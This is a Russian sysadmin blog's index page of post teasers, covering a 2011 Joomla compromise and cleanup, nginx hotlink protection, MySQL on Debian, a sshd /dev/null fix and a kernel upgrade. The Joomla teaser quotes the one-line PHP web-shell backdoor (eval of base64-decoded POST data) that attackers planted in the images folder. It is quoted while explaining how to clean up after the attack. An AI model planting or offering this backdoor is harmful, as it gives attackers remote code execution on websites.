Взлом Joomla, внедрение бекдора и очистка от кода

Опубликовано чт, 01/26/2012 - 16:30 пользователем mef

В конце 2011 года в Joomla была некая уязвимость, которая позволила злоумышленникам положить в директорию images бекдор - файл post.php, следующего содержания

<?php eval(base64_decode($_POST["php"])); ?>

После чего основная масса файлов с расширением php (причем, заражалось все без разбору, включая configuration.php.

Код, который помещался в файл таков:

Метки: 
joomla
base64
бекдор
взлом

Гитарно-вокальное безумие от Walk off the Earth

Опубликовано сб, 01/14/2012 - 13:12 пользователем mef

Когда я вижу что-то подобное, то мне кажется, что все, чем я занимаюсь или пытаюсь заниматься до того обыденное, что аж жуть..*(

Выборы, выборы! - ...

Опубликовано сб, 12/10/2011 - 09:16 пользователем mef

Решил побыть немного хомячком =) Белая лента для меня это слишком, плюс не однозначные интепретации оной. Поэтому ограничусь виртуальным пространством.

 

632305222316434

 

А в целом, мое мнение уже совсем давно было озвучено группой Пурген. Кажется, я ни разу не голосовал. Даже будучи в армии я умудрился куда-то свалить в далекий наряд, чтобы строем не уйти на избирательный участок 8)

Защита от хотлинка с помощью nginx

Опубликовано чт, 12/08/2011 - 13:50 пользователем mef

Изначально мое отношение к хотлинкингу было никаким. Никак не мог придумать ничего такого, почему бы можно было запретить показывать изображения с оригинального сайта на каком-либо другом. У одного блоггера натолкнулся на параноидальную идею, где он рассказывает, что обнаружил сайт, который был практически неотличимой копией его собственного блога. Автор предположил, что это может навредить ему.

Метки: 
nginx

Установка MySQL 5.1 на Debian Lenny

Опубликовано ср, 12/07/2011 - 09:11 пользователем mef

Увы и ах, но еще остаются замшелые сервера с устаревшими морально версиями дистрибутивов, которые все еще хотят молодиться, используя современные версии ПО.

На помощь приходит репозиторий dotdeb.org, который предоставляет пакеты современных версий приложений для устаревших дистрибутивов, основанных на Debian.

Для того, чтобы подключить репозиторий, следует отредактировать файл /etc/apt/sources.list, добавив следующие строки:

Не работает sshd - /dev/null is not a character device!.

Опубликовано вт, 11/29/2011 - 15:58 пользователем mef

Сегодня натолкнулся на проблему с невозможностью запуска sshd под Debian 6.0 (OpenVZ).

/etc/init.d/ssh start
/dev/null is not a character device!

Как оказалось, устройство /dev/null стало файлом. Причины такой метаморфозы искать не стал, хотя где-то натолкнулся в интернетах, что могло возникнуть после апгрейда.

Первый вариант решения проблемы

rm /dev/null
mknod /dev/null c 1 3

Метки: 
linux
debian
sshd
openvz

Сменить префикс таблиц в базе данных mysql

Опубликовано пн, 11/21/2011 - 14:13 пользователем mef

Когда требуется сменить префикс таблиц в mysql, то на помощь придет следующий скрипт, который я нарыл на каком-то форуме:

Метки: 
php
mysql

Проблема с запуском Dovecot

Опубликовано пт, 11/18/2011 - 09:49 пользователем mef

При попытке запустить Dovecot возникает следующая проблема:

Метки: 
dovecot

Релиз ядра Линукс 3.1 и Ubuntu

Опубликовано ср, 10/26/2011 - 16:16 пользователем mef

Новость о выходе нового ядра и описание нововведений можно почитать на ЛОРе.

Нам же интересно другое. В последней версии Ubuntu 11.10 по умолчанию идет ядро 3.0. Но уже сейчас готовы пакеты нового ядра.

Для того, чтобы обновиться, следует выполнить несколько нехитрых действий.

1. Скачиваем пакеты.

Метки: 
ubuntu
kernel
10.11
oneric ocelot

Страницы

Подписаться на Сабынич Вадим. Обо всем понемногу RSS